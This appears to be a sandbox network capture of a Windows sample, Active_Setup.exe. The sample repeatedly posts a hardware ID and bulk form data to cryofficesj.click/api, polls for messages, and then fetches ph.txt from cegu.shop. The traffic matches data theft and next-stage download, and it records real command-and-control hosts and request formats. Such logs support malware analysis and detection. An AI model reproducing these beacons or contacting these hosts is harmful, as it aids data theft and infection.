                                                                                                                                                Data Ascii: AJlnGNjvPm9CeSmfoXVAqhZ3jXhyYY2pVHx1Nz9g4TkCGLUdyKjq7YLtvsskZpF61HHfLWEtTiwQPSS5+GAlOkEa55rbbDitg/xoH7X2wzvRoYt+aC3I7tRsomj8sCV40U21Gxmte+2C/CmapqUQ+leyXGygLYwuET/kv/hi53jDGKZKCL67KlHruNdmptC70iGaveQ8Da5AarW7OePkeAGbZVifqjnuA/zr2eZk17uUc92uoC3OblL8ZGtpcCV
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 4e 33 49 71 4f 72 74 67 75 32 2b 79 79 52 6e 45 72 76 57 4d 68 6e 76 49 2b 2f 50 72 78 49 39 70 37 75 36 34 53 57 36 41 42 74 6d 47 4e 72 75 65 53 31 44 76 69 71 59 39 66 62 44 4f 39 47 68 69 33 35 71 4b 73 79 75 55 79 79 69 61 50 79 77 4a 58 6a 52 54 62 55 5a 47 4b 2f 36 37 73 42 38 71 5a 71 6e 5a 42 4d 34 31 33 4a 63 62 2b 4e 76 7a 47 2b 53 50 4f 51 36 4f 47 4c 6c 4f 49 47 61 4a 49 6f 49 76 72 73 71 55 65 75 34 30 79 4d 6d 45 44 76 48 74 6b 37 6f 4d 6d 33 50 66 55 5a 73 70 33 68 37 34 65 53 34 67 5a 6d 6b 57 78 6d 76 2b 75 35 46 66 36 6a 61 34 57 48 54 4f 46 62 79 6e 61 35 6a 62 59 34 73 30 4c 32 31 71 4f 72 68 34 71 76 58 53 36 35 5a 47 75 54 37 4b 70 48 36 65 31 31 31 35 4a 41 71 41 61 47 64 4c 4b 44 76 7a 79 32 52 2f 47 64 36 4f 47 42 6c 65 63 49 66
                                                                                                                                                Data Ascii: N3IqOrtgu2+yyRnErvWMhnvI+/PrxI9p7u64SW6ABtmGNrueS1DviqY9fbDO9Ghi35qKsyuUyyiaPywJXjRTbUZGK/67sB8qZqnZBM413Jcb+NvzG+SPOQ6OGLlOIGaJIoIvrsqUeu40yMmEDvHtk7oMm3PfUZsp3h74eS4gZmkWxmv+u5Ff6ja4WHTOFbyna5jbY4s0L21qOrh4qvXS65ZGuT7KpH6e1115JAqAaGdLKDvzy2R/Gd6OGBlecIf
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 36 72 4c 49 56 35 4b 56 76 67 5a 59 4c 31 6d 44 68 62 37 53 50 70 79 43 4c 66 2f 57 4d 34 4f 32 58 67 36 4d 51 62 5a 70 6d 61 36 79 72 2f 30 66 35 34 7a 53 75 31 51 53 6f 59 59 67 31 6f 63 6e 6f 63 59 42 43 2f 4a 6a 71 2f 5a 48 66 79 42 39 6a 6b 6e 39 39 2b 71 58 78 41 62 62 37 50 4e 6e 56 53 50 6b 65 6e 69 58 72 30 75 56 69 34 68 47 67 69 61 50 79 77 49 53 76 58 54 7a 61 4b 48 37 36 73 2f 46 41 39 62 46 2b 6b 5a 5a 61 36 78 6e 34 53 35 65 4f 74 6a 53 79 55 62 43 34 35 76 2b 48 30 71 46 46 59 64 51 77 56 66 71 6a 38 54 69 34 34 33 54 58 7a 51 7a 64 58 63 68 37 76 70 2b 68 66 4a 74 47 39 4a 50 71 2b 38 4b 38 35 42 46 70 31 43 59 73 76 4b 76 70 56 37 6a 6a 61 49 62 56 46 4c 67 4d 6e 53 44 71 33 75 42 6a 71 67 2f 72 31 76 75 72 32 4d 43 68 52 58 7a 55 4d 43
                                                                                                                                                Data Ascii: 6rLIV5KVvgZYL1mDhb7SPpyCLf/WM4O2Xg6MQbZpma6yr/0f54zSu1QSoYYg1ocnocYBC/Jjq/ZHfyB9jkn99+qXxAbb7PNnVSPkeniXr0uVi4hGgiaPywISvXTzaKH76s/FA9bF+kZZa6xn4S5eOtjSyUbC45v+H0qFFYdQwVfqj8Ti443TXzQzdXch7vp+hfJtG9JPq+8K85BFp1CYsvKvpV7jjaIbVFLgMnSDq3uBjqg/r1vur2MChRXzUMC
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 46 72 62 74 4c 4a 6a 56 46 4e 45 65 6a 6a 57 47 78 2f 41 70 39 52 6d 79 6f 2b 37 6c 6a 70 58 35 46 43 4f 7a 5a 6d 75 37 2f 61 45 51 2b 65 78 43 6f 62 51 4d 70 68 37 41 4e 65 48 62 2f 6e 47 78 55 4c 4c 4f 76 62 6e 62 78 37 78 53 50 73 5a 33 49 71 4f 72 70 30 65 75 38 53 4c 58 68 77 79 77 48 6f 46 32 71 35 75 32 4d 71 4e 43 74 61 6a 54 7a 49 36 56 37 68 4e 2b 6d 57 52 4e 75 66 71 37 4f 63 69 32 62 35 6d 62 53 2f 35 50 68 6a 76 35 68 76 42 70 6a 41 47 36 31 74 4b 6c 77 49 71 76 58 53 36 68 61 32 4b 30 37 4b 63 57 75 34 52 69 6b 4a 52 61 2b 46 50 4b 56 4c 71 59 75 6e 48 37 41 66 54 57 74 62 6e 4f 30 75 73 55 4c 73 77 34 50 75 47 2b 34 6c 43 6d 38 58 50 5a 6a 41 7a 2b 48 70 34 6e 39 38 6d 69 63 65 30 42 74 5a 58 2f 2b 59 61 52 2b 51 59 70 71 6c 5a 4a 72 65 69
                                                                                                                                                Data Ascii: FrbtLJjVFNEejjWGx/Ap9Rmyo+7ljpX5FCOzZmu7/aEQ+exCobQMph7ANeHb/nGxULLOvbnbx7xSPsZ3IqOrp0eu8SLXhwywHoF2q5u2MqNCtajTzI6V7hN+mWRNufq7Oci2b5mbS/5Phjv5hvBpjAG61tKlwIqvXS6ha2K07KcWu4RikJRa+FPKVLqYunH7AfTWtbnO0usULsw4PuG+4lCm8XPZjAz+Hp4n98mice0BtZX/+YaR+QYpqlZJrei


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | 7532 | C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:13 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UPKT1BAEQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18108
Host: cryofficesj.click
2024-12-30 17:19:13 UTC | 15331 | OUT | Data Raw: 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
Data Ascii: --UPKT1BAEQContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--UPKT1BAEQContent-Disposition: form-data; name="pid"2--UPKT1BAEQContent-Disposition: form-data; name="lid"hRjzG3--ZINA--UPKT1BAEQContent-Dispo
2024-12-30 17:19:14 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:19:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0a795uiqbhb5cnj2ooj5ksbgf3; expires=Fri, 25 Apr 2025 11:05:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CmyURY7aPKMMaPehsMcr9KQ1kAmTIkAE32c%2FzC1mnQMgTrSnK4Rb1zsdSLkazubRiYEH9xVoVV04dZmAcR6EXnI6%2B%2BpM5SCwKnRi2yKXkmbXqZcpleo9SYmw4X5NTL%2BBVKsfmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa3b190de6842fd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2084&rtt_var=796&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19062&delivery_rate=1362575&cwnd=248&unsent_bytes=0&cid=5c20abe2f7a2466f&ts=627&x=0"
2024-12-30 17:19:14 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 17:19:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49733 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7532 | Process: C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:15 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=7QUBYJNPHNLVMQ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8759
    Host: cryofficesj.click
2024-12-30 17:19:15 UTC | 8759 | OUT | Data Raw: (multipart form body; hex dump omitted)
    Data Ascii: --7QUBYJNPHNLVMQContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--7QUBYJNPHNLVMQContent-Disposition: form-data; name="pid"2--7QUBYJNPHNLVMQContent-Disposition: form-data; name="lid"hRjzG3--ZINA--7QUBYJNPH
2024-12-30 17:19:15 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 17:19:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=rkh2hmiur9h9tvnn38q46musgk; expires=Fri, 25 Apr 2025 11:05:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xbGK0EEEZDijbORaCuhItoaimfu3hOg9W0kauUJpltrhOKVdoRc1JRlaH3YHsOT%2BaT2y8YfPJ4eOeGd1cRvqZXAIAoR88PXYguMKJK3LZFZrL155kqS6wLvq11juZy5Vz%2FcdKA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa3b1981b538c17-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1819&rtt_var=769&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9695&delivery_rate=1346242&cwnd=240&unsent_bytes=0&cid=6f98aa77068b8e97&ts=467&x=0"
2024-12-30 17:19:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 17:19:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49734 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7532 | Process: C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:16 UTC | 275 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=VRN1V18XB5
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20388
    Host: cryofficesj.click
2024-12-30 17:19:16 UTC | 15331 | OUT | Data Raw: (multipart form body; hex dump omitted)
    Data Ascii: --VRN1V18XB5Content-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--VRN1V18XB5Content-Disposition: form-data; name="pid"3--VRN1V18XB5Content-Disposition: form-data; name="lid"hRjzG3--ZINA--VRN1V18XB5Content-D
2024-12-30 17:19:16 UTC | 5057 | OUT | Data Raw: (binary payload; hex dump omitted)
2024-12-30 17:19:17 UTC | 1140 | IN | HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 17:19:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=3lki69p078r19hb2r3e2kf7bl2; expires=Fri, 25 Apr 2025 11:05:56 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HzY13RTmTk5FBRdhJv1O1gVldN67kpICu8i%2FZt%2BxaSWWyeFlZ7kugnxuxNbLOvEstOYAGdSayaSR1SQy%2BfmG2Jl4n2jiTq9%2FwggyXWT5vu%2FWyLM62ZaDWO14fVJ%2BQNK7oauIA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa3b1a1389cc407-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1482&rtt_var=569&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21343&delivery_rate=1898569&cwnd=197&unsent_bytes=0&cid=9d28fc10cb2d8154&ts=1333&x=0"
2024-12-30 17:19:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 17:19:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7532 | Process: C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:19 UTC | 273 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1TU6Q0GRH
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 5423
    Host: cryofficesj.click
2024-12-30 17:19:19 UTC | 5423 | OUT | Data Raw: (multipart form body; hex dump omitted)
    Data Ascii: --1TU6Q0GRHContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--1TU6Q0GRHContent-Disposition: form-data; name="pid"1--1TU6Q0GRHContent-Disposition: form-data; name="lid"hRjzG3--ZINA--1TU6Q0GRHContent-Dispo
2024-12-30 17:19:20 UTC | 1135 | IN | HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 17:19:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=heeusvnp8b72qr49k8cufnkp1u; expires=Fri, 25 Apr 2025 11:05:59 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klx4G9BJjQoLwg6UlTyVPMmcOWJrKS%2FJpWEDw4bTRt6%2FpRjdmD%2Fewqz3luW3%2BsV%2B5zb2L0Z6Zio1yGxOEyXdhrikQLt0LOEEsQ7rMZVhkSLmppqaoYuW23YSH8f2Z3nRBMxd1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa3b1b5ee5f43ef-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1592&rtt_var=603&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2843&recv_bytes=6332&delivery_rate=1806930&cwnd=237&unsent_bytes=0&cid=488bfd5cf94660d4&ts=471&x=0"
2024-12-30 17:19:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 17:19:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7532 | Process: C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:21 UTC | 283 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=9GG5ZRYHRIWU2KO84LR
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1262
    Host: cryofficesj.click
2024-12-30 17:19:21 UTC | 1262 | OUT | Data Raw: (multipart form body; hex dump omitted)
    Data Ascii: --9GG5ZRYHRIWU2KO84LRContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--9GG5ZRYHRIWU2KO84LRContent-Disposition: form-data; name="pid"1--9GG5ZRYHRIWU2KO84LRContent-Disposition: form-data; name="lid"hRjzG3--ZI
2024-12-30 17:19:22 UTC | 1138 | IN | HTTP/1.1 200 OK
    Date: Mon, 30 Dec 2024 17:19:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=anb9k0rfnta3g3faer4aev8lvm; expires=Fri, 25 Apr 2025 11:06:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Bp%2FtJ3rHmUU9W%2FLa7DAgMGZ%2FdyBUsHGVZFT%2BXkDmbcJsYWC1IguzTP0m7R0EIKCLWmD31ZYG64vFm%2FOzk7h1wmhxlDpTvFA9w09Vx7UeM1CpFlGX89kT4h%2FMUF4sH%2FDBkXnbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa3b1bc9ac3f795-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1522&rtt_var=574&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2181&delivery_rate=1899804&cwnd=187&unsent_bytes=0&cid=62e4f20e44657cfd&ts=469&x=0"
2024-12-30 17:19:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-30 17:19:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 188.114.97.34 | 443 | 7532 | C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:23 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XTI3RS82PT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 568927
Host: cryofficesj.click
2024-12-30 17:19:23 UTC | 15331 | OUT | Data Raw: 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 58 54 49 33 52 53 38 32 50 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44
Data Ascii: --XTI3RS82PTContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--XTI3RS82PTContent-Disposition: form-data; name="pid"1--XTI3RS82PTContent-Disposition: form-data; name="lid"hRjzG3--ZINA--XTI3RS82PTContent-D
2024-12-30 17:19:24 UTC | 1139 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:19:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qnlkp03kecoo3trl1f5ongvgic; expires=Fri, 25 Apr 2025 11:06:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ei4B3XlwPmSEqD%2FUlQ2r5Mf2ycufoHiMxyjKH1tFisizWJEYqo2IIlJSXmAxu0h6ToGBwTIV4AgW%2BHBsiOAjes1YlS4OTi8uOi2SM7wNlQv9mHRjAxbZ8M75SHa%2BY%2B3Jq8oNTw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa3b1ca4eac1a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2013&rtt_var=766&sent=340&recv=590&lost=0&retrans=0&sent_bytes=2843&recv_bytes=571467&delivery_rate=1417475&cwnd=157&unsent_bytes=0&cid=a9c5030a234b9d77&ts=1635&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 188.114.97.34 | 443 | 7532 | C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:25 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 113
Host: cryofficesj.click
2024-12-30 17:19:25 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=ADD9D589143A96DDC2833675FF85F83D
2024-12-30 17:19:25 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 17:19:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=lihri6af19mldtqo2g630qrjih; expires=Fri, 25 Apr 2025 11:06:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uW5shRFQlV4k7P8Adlw50PIHAg9b08tdvi9jeAa3%2F4IhCIM3ZgcBhnQoxu4fbXHXt81%2BU9ReN8edve99Ze%2BNnbsYCeQZwWU%2FAGTmb7Cs%2BOIf63s60tWzsjph9aGfk55VAIHVkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa3b1d78d8ede99-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1518&rtt_var=574&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1015&delivery_rate=1898569&cwnd=213&unsent_bytes=0&cid=153797e1666ca496&ts=501&x=0"
2024-12-30 17:19:25 UTC | 218 | IN | Data Raw: 64 34 0d 0a 50 2b 6c 4c 77 6b 79 2f 64 55 49 2f 49 63 67 4d 34 4f 74 52 34 72 33 51 61 58 4a 70 46 77 37 55 70 6f 65 4b 47 73 70 43 78 77 46 6b 6b 6d 6d 33 62 6f 56 58 4b 6b 74 56 75 48 2f 61 74 33 36 2b 6b 72 4d 4d 46 52 77 35 66 62 7a 4a 39 39 59 31 38 6e 66 77 4e 51 33 66 65 66 5a 34 69 53 6c 74 54 30 6e 6d 65 4a 69 66 63 38 36 66 74 68 31 51 55 79 55 69 39 73 4f 6c 73 43 75 33 62 72 77 6a 53 73 74 78 34 43 54 4c 41 54 4a 4d 47 35 51 6a 76 4d 51 36 6a 74 53 67 48 77 63 45 66 6e 32 68 7a 36 6e 35 63 71 55 79 6d 79 35 57 68 7a 2b 64 4c 39 4d 46 48 55 78 4a 71 53 4b 55 6b 79 58 41 6b 66 49 50 42 6b 73 74 50 76 69 45 34 71 67 67 2b 6a 2b 61 0d 0a
Data Ascii: d4P+lLwky/dUI/IcgM4OtR4r3QaXJpFw7UpoeKGspCxwFkkmm3boVXKktVuH/at36+krMMFRw5fbzJ99Y18nfwNQ3fefZ4iSltT0nmeJifc86fth1QUyUi9sOlsCu3brwjSstx4CTLATJMG5QjvMQ6jtSgHwcEfn2hz6n5cqUymy5Whz+dL9MFHUxJqSKUkyXAkfIPBkstPviE4qgg+j+a
2024-12-30 17:19:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49745 | 185.161.251.214 | 443 | 7532 | C:\Users\user\Desktop\Active_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:19:26 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: cegu.shop
2024-12-30 17:19:26 UTC | 249 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Mon, 30 Dec 2024 17:19:26 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 329
